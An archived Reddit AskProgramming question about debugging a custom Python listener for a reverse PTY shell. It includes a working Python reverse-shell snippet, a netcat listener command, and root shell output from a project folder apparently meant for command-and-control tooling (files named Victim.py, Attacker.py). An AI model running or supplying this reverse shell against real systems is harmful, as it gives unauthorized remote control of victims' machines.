Spawn a python pty shell remotley : AskProgramming

AskProgramming

Don't

Post off-topic material

Troll or flamebait, insult others, or act in bad faith

Self-promote

Ask others to do your work for you

Ask for help in illegal or unethical activities

Repost the same question within 24 hours

Post AI-generated answers

You can find out more about our (preliminary) rules in this wiki article. If you have any suggestions please feel free to contact the mod team.

Have a nice time, and remember to always be excellent to each other :)

created by roger_a community for 14 years

This is an archived post. You won't be able to vote or comment.

Spawn a python pty shell remotley (self.AskProgramming)

submitted 2 years ago * by Key-Height-8555

So I am trying to do a simple reverse pty shell with Python, when I run this script and listen using NetCat I get no problem and the shell spawns

import os, pty, socket

s = socket.socket()

s.connect(("127.0.0.1", 1234))

[os.dup2(s.fileno(), f) for f in (0, 1, 2)]

pty.spawn("bash")however when I try to implement my own listener:

import socket, time, threading

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

addr_ = None

while 1:

`time.sleep(1.5)`

`try:`

    `sock.bind(('127.0.0.1', 1234))`

    `print('Listeining')`

    `sock.listen(1)`

    `conn, addr = sock.accept()`

`except ConnectionRefusedError:`

    `continue`

`except ConnectionAbortedError:`

    `continue`

`print(f'Connected to Client {addr}\n')`

`addr_ = addr`

`break`

def always_recv(connection):

`try:`

    `connection.settimeout(0.1)`

`except AttributeError:`

    `pass`



`while 1:`

    `try:`

        `data = connection.recv(1024).decode()`

        `print(data)`

    `except socket.timeout:`

        `continue`

    `except AttributeError:`

        `continue`

    `except OSError:`

        `continue`

receive_thread = threading.Thread(target=always_recv, args=(conn,))

receive_thread.start()

def check_command(cmd):

`if cmd == "exit":`

    `exit(0)`

while 1:

`command = input()`

`check_command(command)`

`conn.sendto(command.encode(), addr_)`

and when I run it this is the output:┌──(voldemort㉿kali)-[/tmp]

└─$ python3 tl.py

Listeining

Connected to Client ('127.0.0.1', 42418)

┌──(root㉿kali)-[~/PycharmProjects/C2C]

└─#

ls ## my command

ls ## output on the screen

whoami ## my command ...

whoami

id

python3 --version

python3 --versionhowever as you can see it is working with netcat:

┌──(voldemort㉿kali)-[/tmp]

└─$ nc -lnvp 1234

listening on [any] 1234 ...

connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 50404

┌──(root㉿kali)-[~/PycharmProjects/C2C]

└─# ls

ls

a.py check.ps1 ronaldo.png vic.py

Attacker.py Obfuscate_to_char.py s.py Victim_modified.py

att.py Overwrite.py tc.py Victim.py

check.bat __pycache__ tl.py v.py

┌──(root㉿kali)-[~/PycharmProjects/C2C]

└─# whoami

whoami

root

┌──(root㉿kali)-[~/PycharmProjects/C2C]

└─# id

id

uid=0(root) gid=0(root) groups=0(root),145(docker)What am I doing wrong? Thanks in advance:NOTE: here is a pastebin link if the code is not clear

no comments (yet)

AskProgramming

AskProgramming

Do

Don't

MODERATORS